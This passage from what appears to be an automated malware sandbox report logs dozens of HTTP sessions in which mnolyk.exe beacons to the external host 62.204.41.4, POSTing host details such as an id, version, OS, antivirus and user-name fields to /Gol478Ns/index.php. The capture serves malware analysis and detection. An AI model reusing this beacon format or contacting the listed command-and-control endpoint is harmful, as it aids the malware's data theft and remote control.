                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    157 | 192.168.2.3 | 49859 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:00.842849970 CET | 358 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:00.908272982 CET | 358 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    158 | 192.168.2.3 | 49860 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:01.115035057 CET | 359 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.181586027 CET | 359 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    159 | 192.168.2.3 | 49861 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:01.357770920 CET | 360 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.421011925 CET | 360 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    16 | 192.168.2.3 | 49717 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:14.890075922 CET | 217 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:14.955146074 CET | 217 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    160 | 192.168.2.3 | 49862 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:01.593617916 CET | 361 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.659683943 CET | 361 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    161 | 192.168.2.3 | 49863 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:01.828272104 CET | 362 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:01.892541885 CET | 362 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    162 | 192.168.2.3 | 49864 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:02.060205936 CET | 363 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.125123978 CET | 363 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    163 | 192.168.2.3 | 49865 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:02.300344944 CET | 364 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.371283054 CET | 364 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    164 | 192.168.2.3 | 49866 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:02.560496092 CET | 365 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.622514963 CET | 365 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    165 | 192.168.2.3 | 49867 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:02.794106007 CET | 366 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:02.858184099 CET | 366 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    166 | 192.168.2.3 | 49868 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:03.033762932 CET | 367 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.097748041 CET | 367 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    167 | 192.168.2.3 | 49869 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:03.296837091 CET | 368 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.360726118 CET | 368 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    168 | 192.168.2.3 | 49870 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:03.546237946 CET | 369 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.608895063 CET | 369 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    169 | 192.168.2.3 | 49871 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:03.779794931 CET | 370 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.844167948 CET | 370 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    17 | 192.168.2.3 | 49718 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:15.921504021 CET | 218 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:15.985985994 CET | 218 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    170 | 192.168.2.3 | 49872 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:04.015501976 CET | 371 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.082180023 CET | 371 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    171 | 192.168.2.3 | 49873 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:04.268049002 CET | 371 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.331665039 CET | 372 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    172 | 192.168.2.3 | 49874 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:04.500032902 CET | 373 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.563184023 CET | 373 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    173 | 192.168.2.3 | 49875 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:04.746049881 CET | 374 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.810132980 CET | 374 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
